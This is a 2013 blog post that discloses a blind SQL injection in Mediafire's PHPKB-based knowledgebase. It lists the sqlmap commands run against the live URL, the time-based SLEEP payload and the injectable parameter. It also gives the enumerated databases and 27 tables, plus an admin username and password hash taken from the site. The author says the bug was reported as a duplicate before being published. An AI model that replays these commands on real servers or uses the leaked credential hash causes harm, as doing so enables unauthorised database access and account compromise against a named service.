Tuesday, June 4, 2013

Mediafire Blind SQL Injection



I had found a critical Blind SQLi bug in mediafire knowledgebase. Which could be used to break into mediafire servers. please look below for details..


#Software Tybe: PHPKB Knowledge Base Software v7

#Tool Used: sqlmap on ubuntu

#Tested on: Ubuntu & Windows (Chrome & firefox)

#Commands used in SQL Map:


1>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 -dbs

2>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 -D knowledgebase --tables





Tybe: PHPKB Knowledge Base Software

---------------------
Blind SQL Injection
---------------------

http://knowledgebase.mediafire.com/article.php?id=72

Target:
http://knowledgebase.mediafire.com/article.php?id=%Inject_Here%72

---

Place: GET
Parameter: id

Type: AND/OR time-based blind
Title: Mysql > 5.0.11 AND time-based blind
Payload: id=72 AND SLEEP(5)

---

available databases [3]:

[*] information_schema
[*] knowledgebase
[*] test

Database: knowledgebase
[27 tables]
+-------------------------------+
| phpkb_article_collaboration
| phpkb_article_versions      
| phpkb_article_visits        
| phpkb_articles              
| phpkb_attachments          
| phpkb_authors              
| phpkb_autosave              
| phpkb_categories            
| phpkb_comments              
| phpkb_custom_data          
| phpkb_custom_fields        
| phpkb_favorites            
| phpkb_glossary              
| phpkb_groups                
| phpkb_groups_categories    
| phpkb_groups_relations      
| phpkb_languages            
| phpkb_login_attempts        
| phpkb_news                  
| phpkb_ratings              
| phpkb_referrers            
| phpkb_relations            
| phpkb_saved_searches        
| phpkb_subscribers          
| phpkb_templates            
| phpkb_tickets              
| phpkb_translation_assignments
+-------------------------------+

While digging their tables I found the admin details in the table _authors, it was getting a bit harder as sqlmap was not able to extract the column names completely. So, I made a guess and it was author_username & author_password. So I found the below details-

admin:3793afe7fdea09c7f8055834cc252234

While testing the algorithm of the hash I found that it was md5 or domain cached credentials.
But I couldn't crack it, it was taking a hell lot of time.

So this was all, when I reported it to mediafire's VP they said its duplicate. And hence I made it public.





-Cyb3R_Shubh4M

0 comments:

Post a Comment